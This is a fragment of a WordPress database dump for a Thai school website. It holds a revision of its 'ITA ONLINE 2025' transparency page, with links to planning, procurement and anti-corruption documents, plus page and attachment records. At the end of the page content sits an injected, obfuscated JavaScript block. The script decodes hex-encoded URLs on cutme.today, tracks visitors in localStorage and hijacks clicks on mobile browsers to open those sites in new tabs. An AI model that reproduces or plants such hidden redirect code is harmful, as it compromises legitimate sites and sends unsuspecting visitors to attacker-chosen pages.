{\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-05 14:45:48','2025-07-05 07:45:48','',871,'http://pakhaeng.ssk.in.th/?p=1703',0,'revision','',0),
(1704,1,'2025-07-05 14:50:24','2025-07-05 07:50:24','<!-- wp:image {\"id\":1705,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-2-1024x256.png\" alt=\"\" class=\"wp-image-1705\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1706,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา\"></object><a id=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-67c96f33-a0c3-429f-b91c-3d6cfea2e810\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a5%e0%b8%a2%e0%b8%b8%e0%b8%97%e0%b8%98%e0%b9%8c%e0%b8%ab%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2','','','2025-07-05 14:50:26','2025-07-05 07:50:26','',0,'http://pakhaeng.ssk.in.th/?page_id=1704',0,'page','',0),
(1705,1,'2025-07-05 14:48:31','2025-07-05 07:48:31','','Is It a Gift Instagram Post (2)','','inherit','','closed','','is-it-a-gift-instagram-post-2-2','','','2025-07-05 14:48:31','2025-07-05 07:48:31','',1704,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-2.png',0,'attachment','image/png',0),
(1706,1,'2025-07-05 14:50:04','2025-07-05 07:50:04','','แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา','','inherit','','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a5%e0%b8%a2%e0%b8%b8%e0%b8%97%e0%b8%98%e0%b9%8c%e0%b8%ab%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2','','','2025-07-05 14:50:04','2025-07-05 07:50:04','',1704,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา.pdf',0,'attachment','application/pdf',0),
